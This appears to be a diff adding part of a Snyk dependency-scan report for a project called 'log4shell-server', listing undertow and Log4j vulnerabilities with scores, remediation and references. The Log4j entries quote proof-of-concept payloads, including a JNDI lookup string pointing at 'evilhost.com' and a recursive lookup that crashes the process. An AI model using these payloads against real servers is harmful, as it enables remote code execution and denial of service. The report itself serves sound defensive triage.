+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "low",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
+ "title": "Remote Code Execution (RCE)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.2)",
+ "[2.13.0,2.16.0)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.2",
+ "2.16.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f",
+ "title": "Apache Pony Mail"
+ },
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://twitter.com/marcioalm/status/1471740771581652995",
+ "title": "Twitter Post"
+ },
+ {
+ "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml",
+ "title": "Nuclei Templates"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9,
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 8.1,
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:32.295395Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 8.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99901",
+ "probability": "0.97307",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45046"
+ ],
+ "CWE": [
+ "CWE-94"
+ ],
+ "GHSA": [
+ "GHSA-7rjr-3q55-vv33"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-14T18:28:31.339218Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-14T18:01:28Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "Nuclei Templates",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-14T18:44:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:25.837600Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.16.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "title": "Denial of Service (DoS)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "credit": [
+ "Hideki Okamoto of Akamai Technologies"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.3)",
+ "[2.13.0,2.17.0)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.3",
+ "2.17.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "high",
+ "cvssScore": 7.5,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3230",
+ "title": "JIRA Issue"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:38.288854Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
+ "epssDetails": {
+ "percentile": "0.99523",
+ "probability": "0.95998",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45105"
+ ],
+ "CWE": [
+ "CWE-400"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-17T18:23:58.542986Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-17T18:20:21Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-18T07:05:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.516498Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "high",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "title": "Arbitrary Code Execution",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta7,2.3.2)",
+ "[2.4,2.12.4)",
+ "[2.13.0,2.17.1)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.2",
+ "2.12.4",
+ "2.17.1"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.6,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3293",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1",
+ "title": "Openwall Mail"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:04:47.220633Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
+ "epssDetails": {
+ "percentile": "0.89722",
+ "probability": "0.02239",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-44832"
+ ],
+ "CWE": [
+ "CWE-94"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-28T19:42:55.818691Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-28T19:42:53Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-28T20:17:52Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.472982Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.1"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
